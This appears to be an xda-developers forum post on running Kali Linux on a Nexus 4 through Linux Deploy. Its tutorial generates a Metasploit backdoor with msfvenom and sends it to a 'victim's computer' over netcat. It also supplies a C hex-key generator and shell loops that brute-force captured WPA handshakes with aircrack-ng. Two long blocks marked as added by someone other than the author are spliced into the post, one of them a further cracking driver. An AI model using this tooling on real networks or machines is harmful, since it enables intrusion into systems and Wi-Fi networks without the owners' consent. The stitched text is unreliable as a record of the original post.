Hello everyone!
I was so glad to learn of the release of NetHunter 1.1 by Offensive Security that I immediately decided to try it on my Nexus 4. But it didn't really work, as Nexus 4 devices don't really support external USB devices :/ and even though XDA devs released a patch for this, it made Wi-Fi disappear...
That's why I decided to use Linux Deploy in a new way: I thought this app was really limited, but in the end I managed to get something really similar to a NetHunter device!
So here we are, and I'm going to show you a few steps to install and configure Kali Linux with some tools!
1) Root your phone
2) Download Linux Deploy
3) Download the Kali image, BUT:
The installer will automatically generate a 4 GB image in your internal memory, which is really big, so you have two options:
- Use an external SD card, but that would be a waste of memory
- BETTER SOLUTION: Tap on "Image size (MB)" and enter the amount of memory you want to allocate. I suggest 2200 MB (2.2 GB)
Then go to "Components to install" and UNCHECK EVERYTHING EXCEPT -> SSH SERVER.
Thanks to this, your Linux image will occupy 2.2 GB with a lot of free space in it, so we'll be able to download some utilities without getting useless things such as a graphical desktop.
So just click Install and wait a few minutes for the installation to complete.
So what?
In order to connect to your new Kali environment you will need an SSH client (since we've only selected the SSH server and no VNC).
So just install an SSH client or use a terminal emulator such as "Terminal IDE" (and not Jack Palevich's one, which has no built-in SSH, and I really don't like his emulator).
I personally prefer to use this SSH client: http://ift.tt/1BN3lVJ
This one is light, efficient and not intrusive.
You might also want to install "Hacker's Keyboard" or use Terminal IDE's keyboard. You'll surely need it, as the arrow, Esc and Ctrl keys are really useful.
Then launch your system via the "Launch" button. You should see output like this:
http://ift.tt/1BN3lVL
EXCEPT THAT, since you've only installed the SSH server, your output should look like:
SSH :22 ... done
VNC :5900 ... fail
Awesome.
Now just launch your SSH client.
The default credentials are "android" and "changeme". So after "ssh" just type:
[ssh] android@localhost
and when the system asks you for the password, type "changeme". Change that default password right after your first login (passwd), because the SSH server is reachable over the network, not only from the phone itself.
Just have fun!!
TIP: If the display is too small, just use the volume keys to fix it.
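A check and a fix before going further, as an added example that is not part of the original post: the SSH server you just installed is what you log into over localhost, but unless it is told otherwise sshd accepts connections on every interface of the phone, so any device on the same Wi-Fi can try "android"/"changeme". The script below assumes the chroot uses the Debian/Kali default /etc/ssh/sshd_config (an assumption; check the Linux Deploy settings). It rewrites that config to listen on 127.0.0.1 only and to refuse root logins, verifies the result, and, when called with demo, runs on a constructed sample config rather than the real file:

```shell
#!/bin/sh
# Added example (not from the original post): lock the chroot's SSH server to
# the phone itself and stop relying on the default "android"/"changeme" login.
# Assumption: the chroot uses the Debian/Kali default /etc/ssh/sshd_config.
set -u

# Rewrite CONFIG so sshd only accepts connections from the phone itself
# (127.0.0.1) and refuses root logins. Existing ListenAddress / PermitRootLogin
# lines (commented or not) are removed first, so running this twice does not
# leave duplicate directives behind.
harden_sshd_config() {
    cfg=$1
    tmp="$cfg.tmp"
    grep -v -E '^[[:space:]]*#?[[:space:]]*(ListenAddress|PermitRootLogin)([[:space:]]|$)' "$cfg" > "$tmp" || true
    printf '%s\n' 'ListenAddress 127.0.0.1' 'PermitRootLogin no' >> "$tmp"
    mv "$tmp" "$cfg"
}

# Return 0 when CONFIG has exactly one active ListenAddress and it is loopback,
# 1 otherwise. This is the check to run before trusting the server on a shared Wi-Fi.
sshd_bound_to_loopback() {
    n=$(grep -c -E '^[[:space:]]*ListenAddress[[:space:]]' "$1" || true)
    [ "$n" -eq 1 ] && grep -q -E '^[[:space:]]*ListenAddress[[:space:]]+127\.0\.0\.1[[:space:]]*$' "$1"
}

# Constructed sample config (not a real Kali file), used by the demo below.
sample_config() {
    cat <<'EOF'
# Package generated configuration file
Port 22
#ListenAddress ::
ListenAddress 0.0.0.0
PermitRootLogin yes
PasswordAuthentication yes
EOF
}

# Usage: sh harden_sshd.sh demo   (on the phone, point harden_sshd_config at the real file)
if [ "${1:-}" = "demo" ]; then
    f=$(mktemp)
    sample_config > "$f"
    harden_sshd_config "$f"
    sshd_bound_to_loopback "$f" && echo "sshd now listens on 127.0.0.1 only"
    cat "$f"
    rm -f "$f"
fi
# After editing the real file, restart the server from Linux Deploy (Stop, then
# Start) and change the password with: passwd android
```

The ssh android@localhost command from the post keeps working after this change, because the client runs on the same phone; only connections from other hosts are refused.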
NOW: Some basic steps
1) Check the space available: df -h
2) Get root: su
3) Install all the packages you want.
/WARNING\ : Smartphone Wi-Fi chipsets generally don't support packet injection or monitor mode, even though a few people have managed it; it's really experimental. You can use an external Wi-Fi card; here's the tutorial to do it:
http://ift.tt/1LoM6S7
Some things to install to have fun:
- aircrack-ng to crack the PSK from a captured 4-way handshake (tutorial below)
- Metasploit to send your backdoors (tutorial below)
- tmux, because we're limited to only one window (script below)
- GCC to compile
- Vim to edit
1) Get root
For those who have issues getting root, just follow these steps:
sudo passwd root
Type your new password twice.
2) Install the packages:
apt-get install aircrack-ng
apt-get install metasploit
apt-get install metasploit-framework
apt-get install tmux
apt-get install john
3) If you wish to install SET (the Social-Engineer Toolkit):
cd /opt
sudo apt-get install git
git clone http://ift.tt/1hxnULY set/
cd set/
python setup.py install
Have fun.
THE TUTORIAL PART
You have to consider the fact that you're running in a chrooted environment.
So, in order to access the internal storage, you have to go into the Linux Deploy options: scroll down to "Custom mounts" and enable it. Then tap on "Mount points" and enable all the paths presented. Once you've booted your Linux image, this will let you access all of your phone's data.
Now, how might you communicate with a PC, for example to get your handshake and crack it on your phone, or to send a backdoor generated on your phone?
Here's one solution:
NETCAT. On a Linux or Windows machine with netcat, here's a little Metasploit fun:
On your Kali PHONE, generate the payload (-f exe selects the output format; -e would select an encoder):
msfvenom /your/payload/ OPTIONS -a YOUR_ARCH -f exe and some stuff here > mybackdoor
On your victim's computer, start the listener FIRST (with the OpenBSD netcat shipped by most Linux distributions, write nc -l 1234 without -p):
nc -l -p 1234 > mybackdoor
Then, on your Kali PHONE, push the file to it (the listener's port has to be given):
nc -w 3 IPADDRESS_OF_DESTINATION 1234 < mybackdoor
netcat does not verify anything, so compare a checksum on both ends (sha256sum mybackdoor) before you rely on the copy.
And now, no matter how you managed to transfer the backdoor (netcat, USB cable, any other trick), let's play:
Proof of concept? Here's a Metasploit shell gained on a Linux machine:
AND..... PWNED!! (yeah, that was quite simple...)
Metasploit3
And this netcat trick works with ANY file.
For example: a handshake captured on a Kali PC! Tip: you can reduce its size with wpaclean (note that the output file comes first):
wpaclean <out.cap> <in.cap>
How to crack the key? Pipe crunch into aircrack-ng or john, OR use the program below if you want to generate HEXADECIMAL keys. Keep the size of the key space in mind first: 10 hex characters give 16^10, about 1.1 × 10^12 candidates, and even at 10,000 keys per second that is more than three years of CPU time, so brute force on a phone only makes sense when you already know the key is short or otherwise constrained. Note also that a random generator can output the same key twice and never guarantees it has covered the whole space:
HexKeygenerator
/*
 * HexKeygenerator is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published
 * by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
 *
 * HexKeygenerator is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along with HexKeygenerator. If not, see http://ift.tt/ytFmsU.
 *
 */
// Authors: Sdpbz1, improved by romeoandjuliet
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

void help(const char *name) {
    printf("Usage: %s <Nb keys to generate> <file> <key length in bytes>\n\n", name);
    printf("Example: generate 1000000 keys of 5 random bytes (10 hex chars) in the file dictionary.wpa\n");
    printf("%s 1000000 dictionary.wpa 5\n", name);
}

int main(int argc, char *argv[])
{
    long long nb;   // number of keys to generate
    int size;       // key length in bytes; each byte becomes 2 hex characters
    long long z;
    int i;
    int byte = 0;
    FILE *PF1;

    if (argc != 4) {
        help(argv[0]);
        return 1;
    }
    // Convert to integers and check
    nb = atoll(argv[1]);
    if (nb <= 0) {
        printf("Please enter a valid number of keys!\n");
        help(argv[0]);
        return 1;
    }
    size = atoi(argv[3]);
    if (size <= 0) {
        printf("Please enter a valid key length\n");
        help(argv[0]);
        return 1;
    }
    PF1 = fopen(argv[2], "w");
    if (PF1 == NULL) {
        printf("Can't create file %s\n", argv[2]);
        return 1;
    }
    printf("Generating %lld hexadecimal keys\n", nb);
    srand((unsigned) time(NULL));   // rand() is good enough for a wordlist; it is not a CSPRNG
    for (z = 1; z <= nb; z++) {
        for (i = 1; i <= size; i++) {
            byte = rand() % 256;
            fprintf(PF1, "%02X", byte);   // two upper-case hex digits per byte
        }
        fprintf(PF1, "\n");               // one key per line, as aircrack-ng expects
        if (z % 100000 == 0) {
            printf("%lld keys generated\n", z);
        }
    }
    fclose(PF1);
    return 0;
}
To compile it:
gcc HexKeygenerator.c -o HexKeygenerator
Here's a first script to handle the crack: startup.sh
#!/bin/sh
CORES=1   # cores given to aircrack-ng; IF YOU USE ALL CORES AVAILABLE YOUR PHONE WILL ALMOST FREEZE
for i in $(seq 1 1000000)
do
    ./HexKeygenerator 1000000 password$i.lst 5   # 5 random bytes = a 10-char hexadecimal key
    aircrack-ng /path/to/handshake -e ESSID -w password$i.lst -p $CORES >> log.txt
    rm password$i.lst
    if grep -q "KEY FOUND" log.txt
    then
        grep "KEY FOUND" log.txt > KEY_FOUND   # save the key
        grep "KEY FOUND" log.txt
        break
    fi
done
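The loop above draws candidates at random, so it can test the same key twice and can never tell you it has covered the whole space. Below is an added example (mine, not the original post's script) of the same driver done sequentially: keys are enumerated in order, one block at a time, and the index of the next block is written to a progress file so an interrupted run resumes where it stopped instead of starting over. It assumes aircrack-ng is on the PATH and takes the capture file, ESSID, key length in hex digits and block size as arguments; handshake.cap and MyESSID in the usage line are placeholders. The generator uses awk instead of the C program so a single file is enough:

```shell
#!/bin/sh
# Added example, not the original post's script: sequential, resumable
# hex-key enumeration for aircrack-ng. Placeholder names are marked below.
set -u

# Print COUNT keys of WIDTH hex digits, starting at key index START, in order.
# Index i is printed as a zero-padded upper-case hex number, so every key in
# [START, START+COUNT) appears exactly once: no duplicates and no gaps, which
# a random generator cannot promise. awk does the formatting, no compiler needed.
gen_hex_block() {
    awk -v s="$1" -v n="$2" -v w="$3" '
        BEGIN {
            fmt = "%0" w "X\n"
            for (i = s; i < s + n; i++) printf(fmt, i)
        }'
}

# Number of keys of WIDTH hex digits: 16^WIDTH (shell arithmetic is 64-bit here).
keyspace_size() {
    ks_w=$1; ks_n=1
    while [ "$ks_w" -gt 0 ]; do ks_n=$((ks_n * 16)); ks_w=$((ks_w - 1)); done
    echo "$ks_n"
}

# Index of the next key to try, read from the progress file; 0 if none yet.
read_progress() {
    if [ -f "$1" ]; then cat "$1"; else echo 0; fi
}

# Driver: CAP is the handshake capture, ESSID the network name, WIDTH the key
# length in hex digits, BLOCK how many keys to hand aircrack-ng per round.
# The next start index is written to PROGRESS after every block, so a run that
# is killed (or a phone that reboots) continues where it stopped.
crack_loop() {
    cap=$1; essid=$2; width=$3; block=$4; progress=${5:-progress.txt}
    total=$(keyspace_size "$width")
    start=$(read_progress "$progress")
    while [ "$start" -lt "$total" ]; do
        n=$block
        [ $((start + n)) -gt "$total" ] && n=$((total - start))   # last block may be short
        gen_hex_block "$start" "$n" "$width" > block.lst
        # -p 1: one core only, so the phone stays usable (the post's own warning)
        aircrack-ng "$cap" -e "$essid" -w block.lst -p 1 >> log.txt 2>&1
        if grep -q "KEY FOUND" log.txt; then
            grep "KEY FOUND" log.txt | tee KEY_FOUND
            rm -f block.lst
            return 0
        fi
        start=$((start + n))
        echo "$start" > "$progress"
    done
    rm -f block.lst
    echo "keyspace exhausted without a match" >&2
    return 1
}

# Usage (placeholder file and network names):
#   sh crack_seq.sh run handshake.cap MyESSID 10 1000000
if [ "${1:-}" = "run" ]; then
    shift
    crack_loop "$@"
fi
```

Because each block is a contiguous slice of the key space, the progress file is also a record of how far the search got, which the random version cannot give you; delete it to restart from index 0.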
To have this run and be checked permanently in a tmux session, use this script; it will automatically launch the previous script (save both in the same directory):
#!/bin/sh
SESSION=$USER
tmux new-session -d -s "$SESSION"   # create the session detached first; the commands below act on it
tmux split-window -h
tmux select-pane -t 0
tmux send-keys "sh ./startup.sh" C-m
tmux select-pane -t 1
tmux send-keys "watch -n 30 'grep \"KEY FOUND\" log.txt'" C-m
tmux split-window -v
tmux send-keys "watch -n 30 tail log.txt" C-m   # to check the cracking speed
tmux select-window -t "$SESSION:0"
tmux -2 attach-session -t "$SESSION"
Screenshot?:
And here it is. This is only the beginning! That's why I think Linux Deploy is better and more modular than NetHunter.
Have fun!!!
If you liked this, please check my little website :) :
http://mindhackingdevices.e-monsite....mier-post.html
For French speakers, this post also exists in French on the excellent forum:
http://ift.tt/1LoM4d0
Romeoandjuliet
from xda-developers http://ift.tt/1BN3oRf
via IFTTT